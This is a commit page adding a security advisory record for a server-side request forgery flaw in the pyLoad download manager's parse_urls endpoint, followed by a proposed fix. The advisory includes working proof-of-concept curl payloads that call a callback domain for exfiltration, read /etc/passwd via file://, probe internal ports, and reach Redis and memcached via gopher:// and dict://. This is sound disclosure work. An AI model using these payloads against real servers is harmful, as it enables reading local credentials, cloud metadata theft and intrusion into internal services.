Skip to content

Commit 8395e93

Browse files
1 parent f729c1e commit 8395e93

1 file changed

Lines changed: 57 additions & 0 deletions

File tree

Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2wvg-62qm-gj33",
4+
"modified": "2026-04-04T04:18:43Z",
5+
"published": "2026-04-04T04:18:43Z",
6+
"aliases": [
7+
"CVE-2026-35187"
8+
],
9+
"summary": "pyLoad: SSRF in parse_urls API endpoint via unvalidated URL parameter",
10+
"details": "## Vulnerability Details\n\n**CWE-918**: Server-Side Request Forgery (SSRF)\n\nThe `parse_urls` API function in `src/pyload/core/api/__init__.py` (line 556) fetches arbitrary URLs server-side via `get_url(url)` (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can:\n\n- Make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints\n- **Read local files** via `file://` protocol (pycurl reads the file server-side)\n- **Interact with internal services** via `gopher://` and `dict://` protocols\n- **Enumerate file existence** via error-based oracle (error 37 vs empty response)\n\n### Vulnerable Code\n\n**`src/pyload/core/api/__init__.py` (line 556)**:\n\n```python\ndef parse_urls(self, html=None, url=None):\n if url:\n page = get_url(url) # NO protocol restriction, NO URL validation, NO IP blacklist\n urls.update(RE_URLMATCH.findall(page))\n```\n\nNo validation is applied to the `url` parameter. The underlying pycurl supports `file://`, `gopher://`, `dict://`, and other dangerous protocols by default.\n\n## Steps to Reproduce\n\n### Setup\n\n```bash\ndocker run -d --name pyload -p 8084:8000 linuxserver/pyload-ng:latest\n```\n\nLog in as any user with ADD permission and extract the CSRF token:\n\n```bash\nCSRF=\n```\n\n### PoC 1: Out-of-Band SSRF (HTTP/DNS exfiltration)\n\n```bash\ncurl -s -b \"pyload_session_8000=<SESSION>\" -H \"X-CSRFToken: \" -H \"Content-Type: application/x-www-form-urlencoded\" -d \"url=http://ssrf-proof.<CALLBACK_DOMAIN>/pyload-ssrf-poc\" http://localhost:8084/api/parse_urls\n```\n\n**Result**: 7 DNS/HTTP interactions received on the callback server (Burp Collaborator). Screenshot attached in comments.\n\n### PoC 2: Local file read via file:// protocol\n\n```bash\n# Reading /etc/passwd (file exists) -> empty response (no error)\ncurl ... -d \"url=file:///etc/passwd\" http://localhost:8084/api/parse_urls\n# Response: {}\n\n# Reading nonexistent file -> pycurl error 37\ncurl ... -d \"url=file:///nonexistent\" http://localhost:8084/api/parse_urls\n# Response: {\"error\": \"(37, \\'Couldn't open file /nonexistent\\')\"}\n```\n\nThe difference confirms pycurl successfully reads local files. While `parse_urls` only returns extracted URLs (not raw content), any URL-like strings in configuration files or environment variables are leaked. The error vs success differential also serves as a **file existence oracle**.\n\nFiles confirmed readable:\n- `/etc/passwd`, `/etc/hosts`\n- `/proc/self/environ` (process environment variables)\n- `/config/settings/pyload.cfg` (pyLoad configuration)\n- `/config/data/pyload.db` (SQLite database)\n\n### PoC 3: Internal port scanning\n\n```bash\ncurl ... -d \"url=http://127.0.0.1:22/\" http://localhost:8084/api/parse_urls\n# Response: pycurl.error: (7, 'Failed to connect to 127.0.0.1 port 22')\n```\n\n### PoC 4: gopher:// and dict:// protocol support\n\n```bash\ncurl ... -d \"url=gopher://127.0.0.1:6379/_INFO\" http://localhost:8084/api/parse_urls\ncurl ... -d \"url=dict://127.0.0.1:11211/stat\" http://localhost:8084/api/parse_urls\n```\n\nBoth protocols are accepted by pycurl, enabling interaction with internal services (Redis, memcached, SMTP, etc.).\n\n## Impact\n\nAn authenticated user with ADD permission can:\n\n- **Read local files** via `file://` protocol (configuration, credentials, database files)\n- **Enumerate file existence** via error-based oracle (`Couldn't open file` vs empty response)\n- **Access cloud metadata endpoints** (AWS IAM credentials at `http://169.254.169.254/`, GCP service tokens)\n- **Scan internal network** services and ports via error-based timing\n- **Interact with internal services** via `gopher://` (Redis RCE, SMTP relay) and `dict://`\n- **Exfiltrate data** via DNS/HTTP to attacker-controlled servers\n\nThe multi-protocol support (`file://`, `gopher://`, `dict://`) combined with local file read capability significantly elevates the impact beyond a standard HTTP-only SSRF.\n\n## Proposed Fix\n\nRestrict allowed protocols and validate target addresses:\n\n```python\nfrom urllib.parse import urlparse\nimport ipaddress\nimport socket\n\ndef _is_safe_url(url):\n parsed = urlparse(url)\n if parsed.scheme not in ('http', 'https'):\n return False\n hostname = parsed.hostname\n if not hostname:\n return False\n try:\n for info in socket.getaddrinfo(hostname, None):\n ip = ipaddress.ip_address(info[4][0])\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n return False\n except (socket.gaierror, ValueError):\n return False\n return True\n\ndef parse_urls(self, html=None, url=None):\n if url:\n if not _is_safe_url(url):\n raise ValueError(\"URL targets a restricted address or uses a disallowed protocol\")\n page = get_url(url)\n urls.update(RE_URLMATCH.findall(page))\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "pyload-ng"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "0.5.0b3.dev96"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/pyload/pyload"
46+
}
47+
],
48+
"database_specific": {
49+
"cwe_ids": [
50+
"CWE-918"
51+
],
52+
"severity": "HIGH",
53+
"github_reviewed": true,
54+
"github_reviewed_at": "2026-04-04T04:18:43Z",
55+
"nvd_published_at": null
56+
}
57+
}

0 commit comments

Comments
 (0)